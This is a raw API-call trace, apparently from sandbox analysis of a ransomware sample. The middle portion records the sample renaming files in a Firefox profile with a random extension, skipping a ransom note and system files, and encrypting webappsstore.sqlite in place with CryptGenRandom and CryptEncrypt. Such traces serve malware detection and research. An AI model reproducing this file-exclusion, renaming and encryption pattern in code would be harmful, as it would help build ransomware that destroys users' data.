lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.205] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.205] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.205] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.205] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.205] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.205] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.206] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.206] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.206] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.206] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.206] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.206] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.206] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.206] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.206] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.206] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.206] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.206] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.206] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.206] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.206] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.206] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.206] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.206] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.206] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.206] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.207] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.207] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.207] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.207] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.207] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.207] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.207] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.207] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.207] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.207] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.207] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.207] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.207] lstrlenA (lpString="DELETEATOM") returned 10 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.207] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.207] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.207] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.207] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.207] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.207] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.208] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.208] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.208] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.208] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.208] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.208] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.208] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.208] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.208] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.208] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.208] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.208] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.208] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.209] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.209] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.209] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.209] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.209] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.209] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.209] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.209] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.209] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.209] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.209] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.209] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.209] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.209] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.209] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.209] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.209] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.209] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.209] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.210] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.210] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.210] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.210] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.210] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.210] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.210] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.210] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.210] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.210] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.210] lstrcpyA (in: lpString1=0x3f2c580, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.210] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned 108 [0082.210] wsprintfW (in: param_1=0x3f2d238, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.KAUJZJ") returned 115 [0082.210] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.KAUJZJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.kaujzj"), dwFlags=0x0) returned 1 [0082.211] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.211] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.211] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.211] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80cff0f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps.json", cAlternateFileName="WEBAPP~1.JSO")) returned 0 [0082.211] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0082.211] CloseHandle (hObject=0x460) returned 1 [0082.212] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3a63b40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 1 [0082.212] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="DECRYPT-FILES.txt") returned 1 [0082.212] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="autorun.inf") returned 1 [0082.212] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="boot.ini") returned 1 [0082.212] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="desktop.ini") returned 1 [0082.212] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="ntuser.dat") returned 1 [0082.212] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="iconcache.db") returned 1 [0082.212] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="bootsect.bak") returned 1 [0082.212] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="ntuser.dat.log") returned 1 [0082.212] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="thumbs.db") returned 1 [0082.212] lstrcmpiW (lpString1="webappsstore.sqlite", lpString2="Bootfont.bin") returned 1 [0082.212] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0082.212] lstrcmpiW (lpString1="sqlite", lpString2="lnk") returned 1 [0082.212] lstrcmpiW (lpString1="sqlite", lpString2="exe") returned 1 [0082.212] lstrcmpiW (lpString1="sqlite", lpString2="sys") returned -1 [0082.212] lstrcmpiW (lpString1="sqlite", lpString2="dll") returned 1 [0082.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0082.212] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0082.212] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0082.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webappsstore.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" [0082.212] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0082.215] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=98304) returned 1 [0082.215] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0082.216] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.216] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.216] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.216] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.219] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0082.219] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.221] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.221] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.222] CloseHandle (hObject=0x464) returned 1 [0082.222] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.222] WriteFile (in: hFile=0x460, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0082.223] CloseHandle (hObject=0x0) returned 0 [0082.223] CloseHandle (hObject=0x460) returned 1 [0082.223] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.224] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.224] GetTickCount () returned 0x114d089 [0082.224] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.224] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.224] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.224] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.225] lstrlenA (lpString="kernel32.dll") returned 12 [0082.225] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.225] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.225] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.225] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.225] lstrlenA (lpString="ADDATOMA") returned 8 [0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.225] lstrlenA (lpString="ADDATOMW") returned 8 [0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.225] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.225] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.225] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 